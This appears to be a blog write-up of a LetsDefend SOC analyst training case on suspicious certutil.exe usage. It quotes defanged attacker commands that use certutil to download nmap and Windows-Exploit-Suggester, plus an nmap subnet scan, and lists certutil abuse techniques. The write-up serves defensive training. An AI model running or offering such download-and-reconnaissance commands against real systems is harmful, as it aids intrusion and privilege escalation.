Open in app

Sign in

Write

Sign in

Lets Defend —Suspicious Certutil.exe Usage — EventID 113

Malware Ben
4 min readJul 1, 2022

--

LetsDefend

LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.

https://letsdefend.io

SOC163— Suspicious Certutil.exe Usage

Today a suspicious Certutil.exe usage occured on a host. Certutil is used by threat actors to download files from an external system into a compromised environment.

Monitoring

The investigation start on the Monitoring Page (Figure 1) which simulates a real working Security Operation Center alerts panel. This console offers further details about the security event occuring.

In SOC163 — Suspicious Certutil.exe Usage case, useful host information will help us catch sight of the action taking place, using other tools at our disposal. Always consider the following data when investigating: Event Time, Hostname, IP Address, Related Binary, Binary Path, Command Line and EDR Action.

  • Event Time: March 1, 2022 11:06 A.M
  • Hostname: EricProd
  • IP Address: 172.16.17.22
  • Related Binary: certutil.exe
  • Binary Path: C:/Windows/System32/certutil.exe
  • Command Line: certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip
  • EDR Action: Allowed
Figure 1 — Investigation Channel

In SOC163 — Suspicious Certutil.exe Usage, the attacker executed a command running an executable named Certutil.

What is Certutil.exe ?

Certutil.exe is a command-line program, installed as part of Certificate Services. You can use it to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

Figure 2 — Certutil.exe

How hackers use Certutil.exe ?

  • Used to decode binaries hidden inside certificate files as Base64 information.
  • Used to download files from a given URL.
  • Used to install browser root certificates as a precursor to perform Adversary-in-the-Middle between connections to banking websites.
Figure 3 — Certutil.exe Usage

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The first running command was:

certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip

  • -urlcache — Displays or deletes URL cache entries
  • -split — Embedded ASN.1 element and save it to a file
  • -f — Forces overwrite
  • hXXps://nmap[.]org/dist/nmap-7.92-win32.zip — URL
  • nmap.zip — Filename output

What is Nmap ?

Nmap allows you to scan your network and discover not only everything connected to it, but also a wide variety of information about what’s connected, what services each host is operating, and so on.

Why hackers use Nmap ?

  • List services running on remote/local host
  • Discover live host on network
  • Discover service vulnerabilities using scripting feature in nmap

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Nmap to discover live host service and version on the network by running the following command :

nmap -sV 192.168.0.0/24 -p 80

  • -sV — Service and Version Detection
  • 192.169.0.0/24 — IP CIDR to scan
  • -p 80 — Port to scan

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The second running command Certutil instance was:

certutil.exe -urlcache -split -f hXXps://raw[.]githubusercontent[.]com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py check.py

What is Windows Exploit Suggester ?

This tool compares a target patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Why hackers use Windows Exploit Suggester

The hackers use Windows Exploit Suggestor to gain higher-level permissions on the host system.

Let’s now verify these details on the Log Management and Endpoint Security page.

Log Management

Using the Log Management panel, confirm the suspicious URLs were reached by host 172.16.17.22.

Figure 4 — Log Management
Figure 5 — Raw Log #1
Figure 6 — Raw Log #2

Endpoint Security

Refer the Command History (Figure 7), the Network Connections (Figure 8) and the Process List (Figure 9) on Endpoint Security page. It simulates a real working Endpoint Detection and Response (EDR) security tool.

As it has been pointed out, numerous suspicious attacker-based commands, network connections and processes list are observed.

Figure 7— Command History
Figure 8 — Network Connections
Figure 9— Process History List

Containment

Considering each and every information from our investigation, we are able to define the event as a true positive incident. Containment should be enforced.

Figure 10 — Containment Request

Task Creating

  • Is the current activity suspicious? — Yes, suspicious
  • What is suspicious activity? —Downloading
  • Who performed the activity? — User
Lets Defend
Soc Analyst
Blue Team
Certutil
Lolbin

--

--

Malware Ben
Malware Ben

Written by Malware Ben

66 Followers
2 Following

Cybersecurity Professional

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams